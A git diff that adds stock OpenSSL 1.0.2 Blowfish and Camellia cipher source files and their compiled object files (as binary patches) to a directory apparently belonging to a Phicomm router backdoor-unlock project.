+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#ifndef OPENSSL_NO_BF
+# include <openssl/evp.h>
+# include "evp_locl.h"
+# include <openssl/objects.h>
+# include <openssl/blowfish.h>
+
+static int bf_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                       const unsigned char *iv, int enc);
+
+typedef struct {
+    BF_KEY ks;
+} EVP_BF_KEY;
+
+# define data(ctx)       EVP_C_DATA(EVP_BF_KEY,ctx)
+
+IMPLEMENT_BLOCK_CIPHER(bf, ks, BF, EVP_BF_KEY, NID_bf, 8, 16, 8, 64,
+                       EVP_CIPH_VARIABLE_LENGTH, bf_init_key, NULL,
+                       EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, NULL)
+
+static int bf_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                       const unsigned char *iv, int enc)
+{
+    BF_set_key(&data(ctx)->ks, EVP_CIPHER_CTX_key_length(ctx), key);
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.o
new file mode 100644
index 0000000000000000000000000000000000000000..030b95d94d2ce96a388f5f09c8c8c11689ade188
GIT binary patch
literal 4680
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
O)$IR1yD*p_vj2Z=`f*AC

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.c
new file mode 100644
index 0000000..f9c8401
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.c
@@ -0,0 +1,394 @@
+/* crypto/evp/e_camellia.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_CAMELLIA
+# include <openssl/evp.h>
+# include <openssl/err.h>
+# include <string.h>
+# include <assert.h>
+# include <openssl/camellia.h>
+# include "evp_locl.h"
+# include "modes_lcl.h"
+
+static int camellia_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc);
+
+/* Camellia subkey Structure */
+typedef struct {
+    CAMELLIA_KEY ks;
+    block128_f block;
+    union {
+        cbc128_f cbc;
+        ctr128_f ctr;
+    } stream;
+} EVP_CAMELLIA_KEY;
+
+# define MAXBITCHUNK     ((size_t)1<<(sizeof(size_t)*8-4))
+
+/* Attribute operation for Camellia */
+# define data(ctx)       EVP_C_DATA(EVP_CAMELLIA_KEY,ctx)
+
+# if defined(AES_ASM) && (defined(__sparc) || defined(__sparc__))
+/* ---------^^^ this is not a typo, just a way to detect that
+ * assembler support was in general requested... */
+#  include "sparc_arch.h"
+
+extern unsigned int OPENSSL_sparcv9cap_P[];
+
+#  define SPARC_CMLL_CAPABLE      (OPENSSL_sparcv9cap_P[1] & CFR_CAMELLIA)
+
+void cmll_t4_set_key(const unsigned char *key, int bits, CAMELLIA_KEY *ks);
+void cmll_t4_encrypt(const unsigned char *in, unsigned char *out,
+                     const CAMELLIA_KEY *key);
+void cmll_t4_decrypt(const unsigned char *in, unsigned char *out,
+                     const CAMELLIA_KEY *key);
+
+void cmll128_t4_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                            size_t len, const CAMELLIA_KEY *key,
+                            unsigned char *ivec);
+void cmll128_t4_cbc_decrypt(const unsigned char *in, unsigned char *out,
+                            size_t len, const CAMELLIA_KEY *key,
+                            unsigned char *ivec);
+void cmll256_t4_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                            size_t len, const CAMELLIA_KEY *key,
+                            unsigned char *ivec);
+void cmll256_t4_cbc_decrypt(const unsigned char *in, unsigned char *out,
+                            size_t len, const CAMELLIA_KEY *key,
+                            unsigned char *ivec);
+void cmll128_t4_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+                              size_t blocks, const CAMELLIA_KEY *key,
+                              unsigned char *ivec);
+void cmll256_t4_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+                              size_t blocks, const CAMELLIA_KEY *key,
+                              unsigned char *ivec);
+
+static int cmll_t4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc)
+{
+    int ret, mode, bits;
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    mode = ctx->cipher->flags & EVP_CIPH_MODE;
+    bits = ctx->key_len * 8;
+
+    cmll_t4_set_key(key, bits, &dat->ks);
+
+    if ((mode == EVP_CIPH_ECB_MODE || mode == EVP_CIPH_CBC_MODE)
+        && !enc) {
+        ret = 0;
+        dat->block = (block128_f) cmll_t4_decrypt;
+        switch (bits) {
+        case 128:
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) cmll128_t4_cbc_decrypt : NULL;
+            break;
+        case 192:
+        case 256:
+            dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+                (cbc128_f) cmll256_t4_cbc_decrypt : NULL;
+            break;
+        default:
+            ret = -1;
+        }
+    } else {
+        ret = 0;
+        dat->block = (block128_f) cmll_t4_encrypt;
+        switch (bits) {
+        case 128:
+            if (mode == EVP_CIPH_CBC_MODE)
+                dat->stream.cbc = (cbc128_f) cmll128_t4_cbc_encrypt;
+            else if (mode == EVP_CIPH_CTR_MODE)
+                dat->stream.ctr = (ctr128_f) cmll128_t4_ctr32_encrypt;
+            else
+                dat->stream.cbc = NULL;
+            break;
+        case 192:
+        case 256:
+            if (mode == EVP_CIPH_CBC_MODE)
+                dat->stream.cbc = (cbc128_f) cmll256_t4_cbc_encrypt;
+            else if (mode == EVP_CIPH_CTR_MODE)
+                dat->stream.ctr = (ctr128_f) cmll256_t4_ctr32_encrypt;
+            else
+                dat->stream.cbc = NULL;
+            break;
+        default:
+            ret = -1;
+        }
+    }
+
+    if (ret < 0) {
+        EVPerr(EVP_F_CMLL_T4_INIT_KEY, EVP_R_CAMELLIA_KEY_SETUP_FAILED);
+        return 0;
+    }
+
+    return 1;
+}
+
+#  define cmll_t4_cbc_cipher camellia_cbc_cipher
+static int cmll_t4_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define cmll_t4_ecb_cipher camellia_ecb_cipher
+static int cmll_t4_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define cmll_t4_ofb_cipher camellia_ofb_cipher
+static int cmll_t4_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define cmll_t4_cfb_cipher camellia_cfb_cipher
+static int cmll_t4_cfb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define cmll_t4_cfb8_cipher camellia_cfb8_cipher
+static int cmll_t4_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len);
+
+#  define cmll_t4_cfb1_cipher camellia_cfb1_cipher
+static int cmll_t4_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len);
+
+#  define cmll_t4_ctr_cipher camellia_ctr_cipher
+static int cmll_t4_ctr_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t len);
+
+#  define BLOCK_CIPHER_generic(nid,keylen,blocksize,ivlen,nmode,mode,MODE,flags) \
+static const EVP_CIPHER cmll_t4_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        cmll_t4_init_key,               \
+        cmll_t4_##mode##_cipher,        \
+        NULL,                           \
+        sizeof(EVP_CAMELLIA_KEY),       \
+        NULL,NULL,NULL,NULL }; \
+static const EVP_CIPHER camellia_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,     \
+        keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        camellia_init_key,              \
+        camellia_##mode##_cipher,       \
+        NULL,                           \
+        sizeof(EVP_CAMELLIA_KEY),       \
+        NULL,NULL,NULL,NULL }; \
+const EVP_CIPHER *EVP_camellia_##keylen##_##mode(void) \
+{ return SPARC_CMLL_CAPABLE?&cmll_t4_##keylen##_##mode:&camellia_##keylen##_##mode; }
+
+# else
+
+#  define BLOCK_CIPHER_generic(nid,keylen,blocksize,ivlen,nmode,mode,MODE,flags) \
+static const EVP_CIPHER camellia_##keylen##_##mode = { \
+        nid##_##keylen##_##nmode,blocksize,keylen/8,ivlen, \
+        flags|EVP_CIPH_##MODE##_MODE,   \
+        camellia_init_key,              \
+        camellia_##mode##_cipher,       \
+        NULL,                           \
+        sizeof(EVP_CAMELLIA_KEY),       \
+        NULL,NULL,NULL,NULL }; \
+const EVP_CIPHER *EVP_camellia_##keylen##_##mode(void) \
+{ return &camellia_##keylen##_##mode; }
+
+# endif
+
+# define BLOCK_CIPHER_generic_pack(nid,keylen,flags)             \
+        BLOCK_CIPHER_generic(nid,keylen,16,16,cbc,cbc,CBC,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)     \
+        BLOCK_CIPHER_generic(nid,keylen,16,0,ecb,ecb,ECB,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)      \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,ofb128,ofb,OFB,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)   \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,cfb128,cfb,CFB,flags|EVP_CIPH_FLAG_DEFAULT_ASN1)   \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,cfb1,cfb1,CFB,flags)       \
+        BLOCK_CIPHER_generic(nid,keylen,1,16,cfb8,cfb8,CFB,flags)
+# if 0                          /* not yet, missing NID */
+BLOCK_CIPHER_generic(nid, keylen, 1, 16, ctr, ctr, CTR, flags)
+# endif
+/* The subkey for Camellia is generated. */
+static int camellia_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                             const unsigned char *iv, int enc)
+{
+    int ret, mode;
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    ret = Camellia_set_key(key, ctx->key_len * 8, &dat->ks);
+    if (ret < 0) {
+        EVPerr(EVP_F_CAMELLIA_INIT_KEY, EVP_R_CAMELLIA_KEY_SETUP_FAILED);
+        return 0;
+    }
+
+    mode = ctx->cipher->flags & EVP_CIPH_MODE;
+    if ((mode == EVP_CIPH_ECB_MODE || mode == EVP_CIPH_CBC_MODE)
+        && !enc) {
+        dat->block = (block128_f) Camellia_decrypt;
+        dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+            (cbc128_f) Camellia_cbc_encrypt : NULL;
+    } else {
+        dat->block = (block128_f) Camellia_encrypt;
+        dat->stream.cbc = mode == EVP_CIPH_CBC_MODE ?
+            (cbc128_f) Camellia_cbc_encrypt : NULL;
+    }
+
+    return 1;
+}
+
+static int camellia_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len)
+{
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    if (dat->stream.cbc)
+        (*dat->stream.cbc) (in, out, len, &dat->ks, ctx->iv, ctx->encrypt);
+    else if (ctx->encrypt)
+        CRYPTO_cbc128_encrypt(in, out, len, &dat->ks, ctx->iv, dat->block);
+    else
+        CRYPTO_cbc128_decrypt(in, out, len, &dat->ks, ctx->iv, dat->block);
+
+    return 1;
+}
+
+static int camellia_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len)
+{
+    size_t bl = ctx->cipher->block_size;
+    size_t i;
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    if (len < bl)
+        return 1;
+
+    for (i = 0, len -= bl; i <= len; i += bl)
+        (*dat->block) (in + i, out + i, &dat->ks);
+
+    return 1;
+}
+
+static int camellia_ofb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len)
+{
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    CRYPTO_ofb128_encrypt(in, out, len, &dat->ks,
+                          ctx->iv, &ctx->num, dat->block);
+    return 1;
+}
+
+static int camellia_cfb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len)
+{
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    CRYPTO_cfb128_encrypt(in, out, len, &dat->ks,
+                          ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+    return 1;
+}
+
+static int camellia_cfb8_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, size_t len)
+{
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    CRYPTO_cfb128_8_encrypt(in, out, len, &dat->ks,
+                            ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+    return 1;
+}
+
+static int camellia_cfb1_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                const unsigned char *in, size_t len)
+{
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    if (ctx->flags & EVP_CIPH_FLAG_LENGTH_BITS) {
+        CRYPTO_cfb128_1_encrypt(in, out, len, &dat->ks,
+                                ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+        return 1;
+    }
+
+    while (len >= MAXBITCHUNK) {
+        CRYPTO_cfb128_1_encrypt(in, out, MAXBITCHUNK * 8, &dat->ks,
+                                ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+        len -= MAXBITCHUNK;
+    }
+    if (len)
+        CRYPTO_cfb128_1_encrypt(in, out, len * 8, &dat->ks,
+                                ctx->iv, &ctx->num, ctx->encrypt, dat->block);
+
+    return 1;
+}
+
+# if 0                          /* not yet, missing NID */
+static int camellia_ctr_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                               const unsigned char *in, size_t len)
+{
+    unsigned int num = ctx->num;
+    EVP_CAMELLIA_KEY *dat = (EVP_CAMELLIA_KEY *) ctx->cipher_data;
+
+    if (dat->stream.ctr)
+        CRYPTO_ctr128_encrypt_ctr32(in, out, len, &dat->ks,
+                                    ctx->iv, ctx->buf, &num, dat->stream.ctr);
+    else
+        CRYPTO_ctr128_encrypt(in, out, len, &dat->ks,
+                              ctx->iv, ctx->buf, &num, dat->block);
+    ctx->num = (size_t)num;
+    return 1;
+}
+# endif
+
+BLOCK_CIPHER_generic_pack(NID_camellia, 128, 0)
+    BLOCK_CIPHER_generic_pack(NID_camellia, 192, 0)
+    BLOCK_CIPHER_generic_pack(NID_camellia, 256, 0)
+#else
+
+# ifdef PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_camellia.o
new file mode 100644
index 0000000000000000000000000000000000000000..23427bec5237dad11dc26437a5a3ef74d18192c1
GIT binary patch
literal 9192
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
